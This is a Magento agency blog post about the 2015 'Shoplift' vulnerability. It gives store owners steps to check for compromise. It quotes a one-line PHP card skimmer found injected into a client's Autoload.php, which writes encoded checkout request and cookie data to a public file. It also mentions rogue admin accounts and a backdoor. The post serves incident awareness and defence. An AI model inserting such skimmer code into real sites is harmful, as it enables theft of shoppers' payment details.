Written by Giles Bennett
What's the problem
If you've got a Magento store, then in recent weeks you cannot help but have noticed the numerous reminders about important Magento patches that should be installed to protect the security and integrity of your site. These stem from a security flaw termed the "Shoplift Bug" discovered in January 2015, the full details of which were revealed in April 2015. Although a patch had been made available by Magento in February to fix the flaw, that patch wasn't widely taken up - one estimate was that at the time the details of the flaw were revealed, only 50% of all sites had been patched. We have helped one client (not hosted with us, we hasten to add) who had suffered at the hands of hackers - in their case lib/Varien/Autoload.php had been hacked to include the following : [php]<?php if(preg_match("/checkout|cart/", $_SERVER["REQUEST_URI"])){@file_put_contents(realpath("./")."/media/catalog/product/cache_catalogs", @base64_encode(serialize($_REQUEST)."--".serialize($_COOKIE)). ":", FILE_APPEND); }?>[/php] The result of the hack was that the contents of all requests to URLs which included the words "checkout" or "cart" in them were encoded and left in a file hidden deep within the media folder - that file was publicly accessible and could be picked up and decoded by the hackers at their leisure. Whilst the payment processing was handled by their payment gateway, the card details, expiry dates, CVV numbers and address details were handled on the client's checkout, so all that information was contained within the encoded file. The hack also added a number of "semi-official" looking user accounts, using names like System Backup and email address @magento.com, as well as leaving a backdoor in the skin/ folder for future usage. With those details compromised, the only line of defence against card fraud then becomes the 3D Secure code, if enabled on the account, and if enabled on any website on which the fraudsters attempt to use the card. Either way, by having card details exposed in such a way, you leave yourself vulnerable to very large fines from the PCIDSS side of things.What you should be doing about it
There are a number of things that you can do right now to check if your site is at risk :- Use this free website to check if your site is at risk of the Shoplift bug
- Check the admin accounts on your site (from the admin panel go to System / Permissions / Users) - disable and delete any that you don't recognise straight away, and disable any others. The worst that's going to happen is you annoy someone who you'd forgotten had access to your site, but if you don't recognise them in the list, it's more likely that they've not worked on the site in a while anyway!
- If you have FTP access to your site (and hopefully you've got SFTP access, if any access, to your site) then look in the skin/ folder and see if there are any files in there - folders named "adminhtml", "frontend" and "install" are fine, it's files you're worried about.
- Also if you have SFTP or FTP access to your site, look in the lib/Varien folder and download the Autoload.php file - open it up in a text editor on your computer (it's perfectly safe to do so) and look at the first line - be sure to scroll to the right, if you can - and see if it looks like the suspicious line above.
- Make sure, by asking your hosts, your developers, or us, that the security patches have been installed.
- Make sure, by looking at the bottom of any page in your admin panel, that you're up to date in Magento versions (you should be on version 1.9.1.1). If you're on 1.8, we'll probably forgive you, but if you're on 1.7 or below, it's time to starting thinking about updating to the latest version - get in touch if you're not sure how to go about that.